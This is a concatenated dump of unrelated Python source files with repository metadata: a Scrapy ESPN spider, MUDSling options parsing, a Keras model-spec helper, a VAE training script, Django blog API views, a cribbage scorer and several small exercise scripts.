Python
| false
| false
| 2,331
|
py
|
from datetime import datetime
import scrapy
from scrapy.shell import inspect_response
from college_football_scraper.items import ProFootballScraperItem
class ProFootballSpider(scrapy.Spider):
name = "pro_football"
allowed_domains = ["espn.com"]
start_urls = [
"http://www.espn.com/nfl/teams"
]
def parse(self, response):
filename = response.url.split("/")[-2] + ".html"
with open(filename, 'wb') as f:
f.write(response.body)
for sel in response.css(".span-2 > .mod-container ul li span"):
url = response.urljoin(sel.xpath('a/@href')[1].extract())
yield scrapy.Request(url, callback=self.parse_schedule_content)
crawled = []
def parse_schedule_content(self, response):
self.crawled.append(response.css('.sub-brand-title b::text').extract())
item = ProFootballScraperItem()
# item['date_create'] = datetime.now()
item['name'] = response.css('.sub-brand-title b::text').extract()
item['games'] = []
for game in response.css('table tr[class*=row]'):
if game.css('td::text').extract()[1] == 'BYE WEEK':
x = 'BYE WEEK'
else:
x = {
'date': game.css('td::text').extract()[1],
'opponent': {
'logo': game.css('td ul .team-logo-small a::attr(href)').extract()[0],
'name': game.css('td ul .team-name a::text').extract()[0]
},
'result_time': {
'time': self.get_result(game),
'network': self.get_network(game)
}
}
inspect_response(response, self)
item['games'].append(x)
yield item
print(len(self.crawled))
def get_network(self, game):
if game.css('td')[3].xpath('text()'):
return game.css('td')[3].xpath('text()').extract()[0].split(' ')[2]
return 'played'
def get_result(self, game):
if game.css('td')[3].css('.game-status'):
return game.css('td')[3].css('.game-status span::text').extract()
if game.css('td')[3].xpath('text()'):
return game.css('td')[3].xpath('text()').extract()[0]
|
[
"Nem@Carls-MacBook-Pro.local"
] |
Nem@Carls-MacBook-Pro.local
|
1439f8a0bd6e39194e12cf014e1b345a92b08fee
|
1e0de646b9f291ace218c3cf8e37b4631c8add79
|
/src/mudsling/options.py
|
b776bdf0793f3fc229ba0ae8a8ab6eb6614724ed
|
[] |
no_license
|
joshbenner/mudsling
|
ede02460c0cf3023590713741088c1016f8982bf
|
ed0f00c2a47779ee7df5cf7945fb028d9358bd80
|
refs/heads/master
| 2021-01-17T19:13:31.464822
| 2017-06-18T00:56:39
| 2017-06-18T00:56:39
| 60,486,472
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,163
|
py
|
"""
Shared options for the twisted plugins. Since the custom app runner basically
passes the commandline arguments through, both proxy and server should both
parse the same arguments.
"""
import os
import sys
from pkg_resources import resource_exists, resource_filename
from twisted.python import usage
class Options(usage.Options):
optFlags = [["simple", "s", "Run in a single process with no proxy and a "
"simple Telnet service."]]
optParameters = [
["gamedir", "g", os.path.abspath(os.path.curdir),
"The path to the game directory."],
]
def __init__(self):
super(Options, self).__init__()
self['extra_configs'] = []
def config_paths(self):
"""
Determine the list of locations where configuration files can be found.
:rtype: list
"""
paths = []
if resource_exists('mudsling', 'defaults.cfg'):
paths.append(resource_filename('mudsling', 'defaults.cfg'))
paths.append("%s/settings.cfg" % self['gamedir'])
paths.extend(self['extra_configs'])
return [os.path.abspath(p) for p in paths]
def opt_config(self, path):
"""
Specify path to extra config file. Can be used more than once.
"""
self['extra_configs'].append(os.path.abspath(path))
opt_c = opt_config
def opt_version(self):
"""
Display MUDSling and Twisted versions, then exit.
"""
import mudsling
print "MUDSling version:", mudsling.version
super(Options, self).opt_version()
def postOptions(self):
self['gamedir'] = os.path.abspath(self['gamedir'])
def get_options(args=None):
"""
Parse the MUDSling commandline options from the argv after the script
name.
    Upon failure to parse, will print usage information and exit with code 1.
:rtype: Options
"""
args = sys.argv[1:] if args is None else args
options = Options()
try:
options.parseOptions(args)
except usage.UsageError as e:
sys.stderr.write(e.message + '\n' + str(options))
exit(1)
return options
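# Usage sketch (illustrative, not part of the original module; the game directory
# and extra config path are hypothetical):
#
#     opts = get_options(['--gamedir', '/srv/mygame', '--config', 'extra.cfg'])
#     opts['gamedir']        # absolute path, normalised in postOptions()
#     opts.config_paths()    # defaults.cfg, <gamedir>/settings.cfg, then extra configs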
|
[
"josh@bennerweb.com"
] |
josh@bennerweb.com
|
0e9e64e1b194555091af23e06be2294e7766906a
|
8c6469dbf424c8f8afac562ef0ad4b99f77d1afb
|
/venv/lib/python3.5/site-packages/keras_model_specs/model_spec.py
|
fdc84e2aa7702b851f6c3bfcec9a5d1f4a8eb14c
|
[] |
no_license
|
KIM-jihye/Ganre_classification
|
819b1fcfcf9a5e913db7d4e62b3891367e9980db
|
3274faa0b0f9a2d150fc3d1ac50c048344304f05
|
refs/heads/master
| 2020-03-27T00:59:15.845532
| 2018-08-22T07:52:25
| 2018-08-22T07:52:25
| 145,672,435
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,731
|
py
|
import os
import json
import numpy as np
import importlib
import copy
from six import string_types
from keras.preprocessing.image import load_img
def between_plus_minus_1(x, args=None):
# equivalent to keras.applications.mobilenet.preprocess_input
x = x / 255.
x = x - 0.5
x = x * 2.
return x
def mean_subtraction(x, args=None):
# equivalent to keras.applications.imagenet_utils.preprocess_input (with channels_first)
mean_r, mean_g, mean_b = args
x = x - [mean_r, mean_g, mean_b]
x = x / 255.
x = x * 2.
return x
PREPROCESS_FUNCTIONS = {
'between_plus_minus_1': between_plus_minus_1,
'mean_subtraction': mean_subtraction,
}
SPEC_FIELDS = ['name', 'klass', 'target_size', 'preprocess_func', 'preprocess_args']
with open(os.path.join(os.path.split(__file__)[0], 'model_specs.json')) as file:
BASE_SPECS = json.load(file)
BASE_SPEC_NAMES = BASE_SPECS.keys()
class ModelSpec(object):
@classmethod
def get(cls, base_spec_name, **overrides):
spec = copy.copy(BASE_SPECS.get(base_spec_name, {}))
if len(spec) == 0 and len(overrides) == 0:
return None
spec['name'] = base_spec_name
for field in SPEC_FIELDS:
# Ignore incoming None fields
if overrides.get(field) is not None:
spec[field] = overrides[field]
return ModelSpec(spec)
def __init__(self, spec):
self.name = None
self.klass = None
self.target_size = None
self.preprocess_func = None
self.preprocess_args = None
self.__dict__.update(spec)
self.preprocess_input = lambda x: PREPROCESS_FUNCTIONS[self.preprocess_func](x, args=self.preprocess_args)
if isinstance(self.klass, string_types):
self.klass = self._get_module_class(self.klass)
def as_json(self):
return {
'name': self.name,
'klass': '.'.join([self.klass.__module__, self.klass.__name__]) if self.klass else None,
'target_size': self.target_size,
'preprocess_func': self.preprocess_func,
'preprocess_args': self.preprocess_args
}
def load_image(self, image_path):
img = load_img(image_path, target_size=self.target_size[:2])
image_data = np.asarray(img, dtype=np.float32)
image_data = np.expand_dims(image_data, axis=0)
image_data = self.preprocess_input(image_data)
return image_data
def _get_module_class(self, module_class_path):
module_and_class_parts = module_class_path.split('.')
module = importlib.import_module('.'.join(module_and_class_parts[:-1]))
return getattr(module, module_and_class_parts[-1])
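# Usage sketch (illustrative; 'mobilenet_v1' stands in for whichever keys actually
# exist in model_specs.json, and the image path is hypothetical):
#
#     spec = ModelSpec.get('mobilenet_v1',
#                          target_size=[224, 224, 3],
#                          preprocess_func='between_plus_minus_1')
#     batch = spec.load_image('/tmp/cat.jpg')   # (1, 224, 224, 3) preprocessed array
#     spec.as_json()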
|
[
"wore03@naver.com"
] |
wore03@naver.com
|
11e9bc424f9fe9fd08fcc4a0342973d46855481b
|
ce2bc16ac803434be57c7813732c97ca0b6bd6c7
|
/lab03/exercise_1.py
|
281d3c3ac017e9a7f1de21e9ce96d3ac97068b51
|
[] |
no_license
|
mathana96/dev-ops
|
0600b22b39d7b619d7f6e303d6d7366b068fb98e
|
c5eb00294bdcd4965e409b17f62e904ffd17b239
|
refs/heads/master
| 2021-07-15T22:01:27.180601
| 2017-10-19T17:59:32
| 2017-10-19T17:59:32
| 104,484,013
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 83
|
py
|
def miles_to_feet(miles):
return miles*5280
print(miles_to_feet(13), 'feet')
|
[
"mathana96@gmail.com"
] |
mathana96@gmail.com
|
170eb15dd108319e3dd7d98ee27b9c4fe775a40c
|
91f853597f03898415878e1b2f1c3086880c5369
|
/dictionary.py
|
ceed421d4b2d4cbd188f9cf3acc81da6bb372dcb
|
[] |
no_license
|
crakama/Python-Playground
|
0b7c6826c536f81d1ab23e4e07a0181c05ec19c6
|
a044d690c7e63c1e3b74383e1426d07d04c103fc
|
refs/heads/master
| 2021-01-17T16:00:20.546879
| 2016-06-20T20:42:03
| 2016-06-20T20:42:03
| 58,690,862
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,046
|
py
|
# Enter your code here. Read input from STDIN. Print output to STDOUT
def dictionary(dictlist, dictlist2):
dictMap = dict(s.split(' ') for s in dictlist)
keys = dictMap.keys()
for x in dictlist2:
if x in keys:
print "{}={}".format(x,dictMap[x] )
else:
print "Not found"
dict_ = int(raw_input())
dictlist = []
dictlist2 = []
for i in range(0, dict_):
string = raw_input()
dictlist.append(string)
for z in range(0, dict_):
string2 = raw_input()
dictlist2.append(string2)
dictionary(dictlist,dictlist2)
# Enter your code here. Read input from STDIN. Print output to STDOUT
import sys
dict_ = int(raw_input().strip())
contacts = {}
dictlist = []
for i in range(dict_):
string = raw_input().strip().split(' ')
contacts[str(string[0])] = int(string[1])
for i in range(dict_):
string2 = raw_input()
dictlist.append(string2)
for line in dictlist:
if line in contacts:
print "{}={}".format(line, contacts[line])
else:
print 'Not found'
|
[
"crakama89@gmail.com"
] |
crakama89@gmail.com
|
5ac0b2762aefba1170831c34bd85f611ef70882b
|
f6597a4ff486091aa0f12999a793a61f70a5e7e6
|
/common/game/config.py
|
046daeee0e2ca32b772e055ce93e27d3095677b8
|
[] |
no_license
|
Voldy87/battleshippy
|
775e2ffb7446556ed087ec50bc1611092e16ae34
|
4e51bd51f45abec91933dd5418d92b7b17dafcf4
|
refs/heads/master
| 2021-09-06T22:02:52.735354
| 2018-02-12T10:11:57
| 2018-02-12T10:11:57
| 113,707,497
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 616
|
py
|
from common.utils.enums import InterfaceType, StorageType


def buildTerminalCodes():
    # The terminal escape codes were missing from the original source; the empty
    # strings below are placeholders so the module parses, not the real values.
    res = {
        "Reset": "",
        "Void": "",
        "Ship": "",
        "Sinked": "",
        "Shot": "",
        "LastShot": "",
    }
    return res


class GameConfig():
    # The default for `clear` was missing in the original source; True is a placeholder.
    def __init__(self, interface: InterfaceType, storage: StorageType, shipDistance: int,
                 shotRadius: int, LetCol: bool, outputPC: bool, clear: bool = True):
        self.data = storage
        self.distance = shipDistance
        self.area = shotRadius  # taken from config, too
        self.LetCol = LetCol
        self.viewPCoutput = outputPC
        self.clear = clear

    def load(self):
        pass

    def save(self):
        pass
|
[
"ing.orlandi.andrea@gmail.com"
] |
ing.orlandi.andrea@gmail.com
|
242e1932b6c0ce135a1f29cac19fa16670a1c91e
|
0ae860c93319e6f02dacc9f6aca03faca3e612ce
|
/train.py
|
eeb554b5e7b2ac9ce59dcdb75848528eabffa2e4
|
[] |
no_license
|
cenchaojun/basic_detector
|
52f50bdae717537828312720ed6bbb48922b88db
|
09f388f79a634347b4cd0ccb870c2d1d52c52033
|
refs/heads/master
| 2022-02-01T23:30:02.930967
| 2019-05-21T08:20:47
| 2019-05-21T08:20:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,512
|
py
|
import InfoManagement
import BuildModelpy
import BuildDataLoader
import torch
from Mnist_Net import test_if_cuda_ok
import numpy as np
# Parameters and file paths
train_index_file = './PIE_DATA/train_index.txt'
log_file_path = './model/log.txt'
info_file_path = './model/info.info'
from torch.autograd import Variable
from torchvision.utils import save_image
GPU_NUM = -1
TOTAL_SIZE = 10262
TRAIN_SIZE = 10000
VALIDATE_SIZE = TOTAL_SIZE - TRAIN_SIZE
BATCH_SIZE = 50
IMG_SIZE = 64
ClassNum = 10
EPOCH = 600
SAVE_STEP = 3
# Inspect the device and decide whether to use the GPU
torch.cuda.set_device(1)
test_if_cuda_ok.test_gpu()
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(device)
if torch.cuda.is_available():
print('USE cuda')
else:
print('USE CPU')
# Set up the model folder, the log file, and the info file
model_folder = InfoManagement.ModelFloder(rebuild=False)
log = InfoManagement.LogFile(log_file_path, renew=False)
info = InfoManagement.InfoFile(info_file_path)
PRE_EPOCH = model_folder.epoch  # resume from the previously saved epoch
# Reuse the previous train/validation split if one was saved
train_index = []
validata_index = []
if info.data != None:
[train_index, validata_index] = info.data
else:
train_index = list(np.random.choice(range(TRAIN_SIZE + VALIDATE_SIZE), TRAIN_SIZE, replace=False))
validata_index = []
for x in range(TRAIN_SIZE + VALIDATE_SIZE):
if x not in train_index:
validata_index.append(x)
print(x)
info.dump([train_index, validata_index])
# Build the data loaders, model, optimizer and loss function
[train_loader, validate_loader] = \
BuildDataLoader.BuildTraining(BATCH_SIZE, IMG_SIZE,
train_index_file ,train_index, validata_index)
[basic_model, loss_fun] = \
BuildModelpy.build_model(ClassNum=ClassNum)
# print(len(validate_loader))
if model_folder.load_model():
basic_model = model_folder.load_model()
print('load pre_model')
else:
print('build new model ')
basic_model = basic_model.to(device)
optimizer, scheduler = \
BuildModelpy.build_optimizer(basic_model)
# Start training
loss_list = []

# Compute the accuracy over one batch of inputs
def cal_acc(basic_model, inputs, labels):
correct = 0
predicts = []
with torch.no_grad():
inputs = inputs.to(device)
outputs = basic_model(inputs)
        # predicts holds the column index of the max value in each row
_, predicts = torch.max(outputs, 1)
correct += (predicts == labels).sum()
acc = float(correct) / float(len(labels))
log.write('acc: %f\n' % acc)
del inputs, outputs, predicts, acc
return float(correct)
def train_model(pre_epoch, total_epoch):
for epoch in range(pre_epoch, total_epoch):
epoch_loss: float = 0 # total loss in one epoch
log.write('epoch: %d\n' % epoch)
train_acc = 0 # accuracy in training set
count = 0 # show iteration in one epoch
log.write('lr: %lf\n' % BuildModelpy.get_learning_rate(optimizer)[0])
for data1 in train_loader:
[inputs, labels] = data1 # use zip to validate model during training
inputs, labels = inputs.to(device), labels.to(device)
optimizer.zero_grad()
outputs = basic_model(inputs)
recon_x, mu, logvar = basic_model(inputs)
loss = loss_fun(recon_x, inputs, mu, logvar)
loss.backward()
optimizer.step()
            # Record the loss value
loss_list.append(loss)
# log.write('iter: %d, loss: %f\n' % (count, loss))
epoch_loss = float(epoch_loss + loss)
# train_acc = train_acc + cal_acc(basic_model, inputs, labels)
del inputs, outputs, loss, labels
del recon_x, mu, logvar
count = count + 1
log.write('epoch_loss: %f\n' % epoch_loss)
scheduler.step()
# print(BuildModel.get_learning_rate(optimizer))
# log.write('total_correct: %f\n' % train_acc)
if epoch % SAVE_STEP == 0:
basic_model.eval()
sample = Variable(torch.randn(64, 64)).cuda()
sample = basic_model.decoder(basic_model.fc2(sample).view(64, 256, 16, 16)).cpu()
save_image(sample.data.view(64, 1, 64, 64),
'result/sample_' + str(epoch) + '.png')
print('img saved')
# save model
model_folder.save_model(basic_model)
if __name__ == '__main__':
train_model(PRE_EPOCH, EPOCH)
|
[
"35644942+floatingstarZ@users.noreply.github.com"
] |
35644942+floatingstarZ@users.noreply.github.com
|
988f5a199dc0023d57a799d494c2ff084c671857
|
207d8dfb55521fc872e719d51dc9888f53d37c02
|
/apps/Skill/config.py
|
11ee7291a7cb5a54213efc36c2555fcda18a6018
|
[
"MIT"
] |
permissive
|
Gaganabbot/DigiMateApp
|
8eb75efc073770ad40eb8847f24693206f4f4f79
|
96bbc581eca46421dad2bc28333030f556b22be9
|
refs/heads/main
| 2023-08-18T14:07:20.849086
| 2021-10-09T04:31:03
| 2021-10-09T04:31:03
| 415,201,638
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 189
|
py
|
from django.apps import AppConfig
class SkillConfig(AppConfig):
# default_auto_field = 'django.db.models.BigAutoField'
# name = 'Skill'
name = 'apps.Skill'
label = 'Skill'
|
[
"abbotgagan.vasu@gmail.com"
] |
abbotgagan.vasu@gmail.com
|
2d649ccf72a307bdb505a8e40c224565c08e1435
|
ceb2ef3dcb89ebda8a56623d1e76a43e4094aaf7
|
/blog/views.py
|
5ebd15d473640a00f22c3695d3bfed538a12d550
|
[] |
no_license
|
Kagati-Incorporation/demo-api
|
13565a58b21a395e6fa638179a3f603deaa9c8ca
|
52f8afeceacc9ad4ccf2b002c90175f75e765e9d
|
refs/heads/main
| 2023-05-07T11:55:34.531710
| 2021-05-19T08:39:20
| 2021-05-19T08:39:20
| 368,797,214
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,563
|
py
|
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import filters, viewsets, status
from rest_framework.response import Response
from common.permissions import IsAdminUserOrReadOnly
from .models import (
BlogCategory,
Article,
)
from .serializers import (
BlogCategorySerializer,
ArticleSerializer,
)
class CategoryAPI(viewsets.ModelViewSet):
"""
Category Listing API
"""
permission_classes = (IsAdminUserOrReadOnly,)
serializer_class = BlogCategorySerializer
queryset = BlogCategory.objects.all()
def paginate_queryset(self, queryset):
if self.paginator and self.request.query_params.get(self.paginator.page_query_param, None) is None:
return None
return super().paginate_queryset(queryset)
def create(self, request):
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(
{
'message': 'Successfully Added Category',
'data': serializer.data
},
status.HTTP_201_CREATED
)
else:
return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)
def update(self, request, *args, **kwargs):
obj = self.get_object()
serializer = self.get_serializer(obj, data=request.data)
if serializer.is_valid():
obj = serializer.save()
return Response(
{
'message': 'Successfully Edited Category',
'data': serializer.data
},
status.HTTP_200_OK
)
else:
return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
name = instance.title
self.perform_destroy(instance)
return Response(
{
'message': f'{name} Deleted Successfully'
},
status.HTTP_204_NO_CONTENT
)
class ArticleAPI(viewsets.ModelViewSet):
"""
Article Listing API
search param:
Category Title
Filter param:
Category ID
Ordering Param:
views
"""
permission_classes = (IsAdminUserOrReadOnly,)
serializer_class = ArticleSerializer
queryset = Article.objects.all()
filter_backends = [filters.SearchFilter, filters.OrderingFilter, DjangoFilterBackend]
search_fields = ['category__title', 'title']
filterset_fields = ('category', 'author')
ordering_fields = ['views', 'created_at']
def retrieve(self, request, pk):
article = self.get_object()
session_key = 'viewed_article_{}'.format(article.id)
if not request.session.get(session_key, False):
article.views += 1
article.save()
request.session[session_key] = True
return Response(ArticleSerializer(article).data)
def create(self, request):
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
serializer.save(author=request.user)
return Response(
{
'message': 'Successfully Added Article',
'data': serializer.data
},
status.HTTP_201_CREATED
)
else:
return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)
def update(self, request, *args, **kwargs):
obj = self.get_object()
serializer = self.get_serializer(obj, data=request.data)
if not (obj.author == request.user):
return Response(
{
'message': 'Unauthorized User !'
}, status.HTTP_403_FORBIDDEN
)
if serializer.is_valid():
obj = serializer.save()
return Response(
{
'message': 'Successfully Edited Article',
'data': serializer.data
},
status.HTTP_200_OK
)
else:
return Response(serializer.errors, status.HTTP_400_BAD_REQUEST)
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
        name = instance.title
self.perform_destroy(instance)
return Response(
{
'message': f'{name} Deleted Successfully'
},
status.HTTP_204_NO_CONTENT
)
|
[
"ajaykarki333@gmail.com"
] |
ajaykarki333@gmail.com
|
e286a7fae6c77f9c18bb9c0f7ca4a85580e0e8cf
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/testData/override/overriddenMethodRaisesNotImplementedError_after.py
|
75e07e08f875187bf0e1ff426642397036a7e7df
|
[
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 168
|
py
|
class A:
def m(self):
"""Abstract method."""
raise NotImplementedError('Should not be called directly')
class B(A):
def m(self):
pass
|
[
"mikhail.golubev@jetbrains.com"
] |
mikhail.golubev@jetbrains.com
|
f0b454bac4434f77a0742f80849f5e4ca6fc0574
|
4ee39c4c0ff2038f7834abdae82e74647bdcb596
|
/Lesson3/time_example.py
|
9f67681629355400addb3059b6dd575ae4abcae6
|
[] |
no_license
|
michaeldelcid/Design6
|
994a42d027080c7cb3413dd2cbba7a939b376b5f
|
cfd4080fcef6688d899c6af9a099f4e3a68dc40f
|
refs/heads/master
| 2021-05-24T15:40:36.722511
| 2020-05-10T23:51:06
| 2020-05-10T23:51:06
| 253,636,153
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 225
|
py
|
#Displays current time every 10 seconds
import time
while True:
try:
nowtime = time.time()
print(time.asctime(time.localtime(nowtime)))
time.sleep(10)
except KeyboardInterrupt:
exit()
|
[
"DiegoOrnelas@Diegos-MBP.home"
] |
DiegoOrnelas@Diegos-MBP.home
|
8b03ceae0eed2e323a4dda60dc65d17b7bce4ae3
|
27cc9a0797304ee837b899805deb9a3b8ba98fe8
|
/recognizer/settings.py
|
70d2d18bc94674bf1f7d13ad58a7e298dac49c6d
|
[] |
no_license
|
ivanpobeguts/celebrities_recognizer
|
ef20ebf073fb05bd5f1557f85703f396d7751caa
|
a1a259ea2d4f42e08d82264d1c096339e377d50a
|
refs/heads/master
| 2020-03-30T06:35:28.066632
| 2019-02-26T12:16:44
| 2019-02-26T12:16:44
| 150,873,124
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 468
|
py
|
import cv2
import dlib
import logging
recognizer = cv2.face.LBPHFaceRecognizer_create(threshold=95)
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor("shape_predictor_68_face_landmarks.dat")
face_cascade = cv2.CascadeClassifier('opencv_files/lbpcascade_frontalface.xml')
logger = logging.getLogger('Debug logger')
logger.setLevel(logging.INFO)
ch = logging.StreamHandler()
# ch.setLevel(logging.INFO)
logger.addHandler(ch)
labels_dict = {}
|
[
"Ivan.Pobeguc@gmail.com"
] |
Ivan.Pobeguc@gmail.com
|
1e860576902d08e2ba1bdeef159021e45fde7caf
|
d18fe449ca37dca20c420b5a5e3f236dd4671f1f
|
/main.py
|
ea3023706d48149ac9aa16e253f80098547007d2
|
[] |
no_license
|
makhtar-sarr/python-projet
|
db55afb156972fe65893d02a1c1efd099433aa0f
|
b0d8bbd1ce0c2566e32b3c09f97faaa3f59d3c97
|
refs/heads/master
| 2023-06-13T02:37:36.745837
| 2021-07-01T20:21:23
| 2021-07-01T20:21:23
| 382,161,401
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 811
|
py
|
# Module imports
from point import *
from cercle import *
from cylindre import *
# Test the Point class
print("**** Teste de la classe Point ***")
point1 = Point(4, 0)
point2 = Point(1, 2)
point1.afficher()
point2.afficher()
print()
# Test the Cercle class
print("*** Teste de la classe Cercle ***")
cercle = Cercle(0, 0, 4)
print("Perimetre = ",cercle.getPerimetre())
print("Surface = ",cercle.getSurface())
if cercle.appartient(point1) == True:
print("Point1 appartient au Cercle ")
else:
print("Point1 n\'appartient au Cercle ")
if cercle.appartient(point2) == True:
print("Point2 appartient au Cercle ")
else:
print("Point2 n\'appartient au Cercle ")
cercle.afficher()
print()
# Test the Cylindre class
cylindre = Cylindre(0, 4, 8, 10)
print("Volume =", cylindre.getVolume())
|
[
"makhtar.sarr@univ-thies.sn"
] |
makhtar.sarr@univ-thies.sn
|
76d685a1fbc238802b19c89e2a55dae3af5f6355
|
e47b1cd94c3cefa4a44ebdfcc87050896d14a8f4
|
/Points.py
|
fc74bdb86938bc992469a111cb9f1671b494df0b
|
[] |
no_license
|
thesonofpaul/Cribbage
|
ce8715c3860007954f1cf1ed20480f611613e1ff
|
e415a2e69e798c72d9921dbe29f8b2bd91c8c1e1
|
refs/heads/master
| 2021-01-19T18:42:13.629803
| 2017-04-22T00:38:36
| 2017-04-22T00:38:36
| 88,375,608
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,108
|
py
|
class Points(object):
def __init__(self, cards, top_card):
self.cards = cards
self.cards.append(top_card)
self.cards_only_rank = []
for card in self.cards:
self.cards_only_rank.append(card.rank)
self.cards_only_rank.sort()
self.top_card = top_card
self.points = 0
def run_points(self):
# print "---------------"
# for card in self.cards:
# print card
# print "---------------"
self.fifteens()
self.pairs()
self.runs()
self.flush()
self.nobs()
def fifteens(self, index=0, total=0):
# print "fifteens"
for i in range(index, 5):
value = 10 if self.cards_only_rank[i] > 9 else self.cards_only_rank[i]
subtotal = total + value
if subtotal == 15:
self.points += 2
elif subtotal < 15:
self.fifteens(i + 1, subtotal)
def pairs(self):
# print "pairs"
for i in range(len(self.cards_only_rank)):
for j in range(len(self.cards_only_rank)):
if j > i and self.cards_only_rank[i] == self.cards_only_rank[j]:
self.points += 2
def runs(self):
# print "runs"
for index in range(len(self.cards_only_rank)-2):
card1 = self.cards_only_rank[index]
card2 = self.cards_only_rank[index+1]
card3 = self.cards_only_rank[index+2]
card4 = None
card5 = None
if index < len(self.cards_only_rank)-3:
card4 = self.cards_only_rank[index+3]
if index < len(self.cards_only_rank) - 4:
card5 = self.cards_only_rank[index+4]
if card1+1 == card2 and card2+1 == card3:
if card3+1 == card4:
if card4+1 == card5:
self.points += 5
elif card4 == card5:
self.points += 8
else:
self.points += 4
break
elif card3 == card4:
if card4 == card5:
self.points += 9
elif card4+1 == card5:
self.points += 8
else:
self.points += 6
break
else:
self.points += 3
elif card1+1 == card2 and card2 == card3:
if card3 == card4 and card4+1 == card5:
self.points += 9
elif card3+1 == card4:
if card4 == card5:
self.points += 12
elif card4+1 == card5:
self.points += 8
else:
self.points += 6
break
elif card1 == card2 and card2+1 == card3:
if card3 == card4 and card4+1 == card5:
self.points += 12
elif card3+1 == card4:
if card4 == card5:
self.points += 12
elif card4+1 == card5:
self.points += 8
else:
self.points += 6
break
elif card1 == card2 == card3 and card3+1 == card4 and card4+1 == card5:
self.points += 9
break
def flush(self):
# print "flush"
        # work on a copy so that removing the cut card does not mutate self.cards
        temp_cards = list(self.cards)
        temp_cards.remove(self.top_card)
for i in range(len(temp_cards)-1):
if temp_cards[i].suit != temp_cards[i+1].suit:
return
if temp_cards[0].suit == self.top_card.suit:
self.points += 5
else:
self.points += 4
def nobs(self):
# print "nobs"
if self.top_card.rank == 11:
self.points += 1
return
for card in self.cards:
if card.rank == 11 and card.suit == self.top_card.suit:
self.points += 1
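# --- Hedged usage sketch, not part of the original file: Points expects card
# --- objects exposing .rank (1-13, with 11 = Jack) and .suit. The namedtuple
# --- below stands in for whatever Card class the rest of the project defines.
if __name__ == "__main__":
    from collections import namedtuple
    Card = namedtuple("Card", ["rank", "suit"])
    hand = [Card(5, "H"), Card(5, "D"), Card(5, "S"), Card(11, "C")]
    cut = Card(5, "C")
    scorer = Points(hand, cut)
    scorer.run_points()
    print(scorer.points)  # 29, the maximum cribbage hand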
|
[
"zip822@gmail.com"
] |
zip822@gmail.com
|
15e54e2df375dea9ea57b03a8e8b762aeceba27f
|
91d1a6968b90d9d461e9a2ece12b465486e3ccc2
|
/cloudhsmv2_write_f/cluster_modify.py
|
4f98bd4495101541c02e7be7ac34b2aecfad03bd
|
[] |
no_license
|
lxtxl/aws_cli
|
c31fc994c9a4296d6bac851e680d5adbf7e93481
|
aaf35df1b7509abf5601d3f09ff1fece482facda
|
refs/heads/master
| 2023-02-06T09:00:33.088379
| 2020-12-27T13:38:45
| 2020-12-27T13:38:45
| 318,686,394
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 869
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html
if __name__ == '__main__':
"""
create-cluster : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudhsmv2/create-cluster.html
delete-cluster : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudhsmv2/delete-cluster.html
describe-clusters : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudhsmv2/describe-clusters.html
initialize-cluster : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudhsmv2/initialize-cluster.html
"""
write_parameter("cloudhsmv2", "modify-cluster")
|
[
"hcseo77@gmail.com"
] |
hcseo77@gmail.com
|
8189d9b62eaf50260c9bf25002b16465287e537d
|
f0117325b7a40779965b35ec6cefc8d12353d779
|
/python_exercises/py_part1_ex/9_one_to_ten.py
|
b4663a6bc10c31703648a4cfcc871ba081b263fc
|
[] |
no_license
|
joshwestbury/Digital_Crafts
|
4188e71ad631439dcb2cca9eea63d29400c37dc0
|
66c06f198d110388781a30c0ecb7902d3a8daf5a
|
refs/heads/master
| 2021-07-24T05:37:02.370341
| 2017-11-04T14:36:39
| 2017-11-04T14:36:39
| 103,189,666
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 59
|
py
|
count = 0
while count < 10:
    count += 1
print(count)
|
[
"joshwestbury@gmail.com"
] |
joshwestbury@gmail.com
|
d207853ea6fce05a1527e4ac9cc1b8ee1c66a4c9
|
345b6cfbb505076afc2593da0d834a468d6fb4e4
|
/projects/curling/python/dc.py
|
921e1b2a62089f3e6b5a97e415320321b3941aa2
|
[] |
no_license
|
u-tokyo-gps-tanaka-lab/gpw2016
|
880d6f8ec097c122ba758767c97e668a8de255d4
|
2760930ec1cacdd7d78f86268beac693a537582b
|
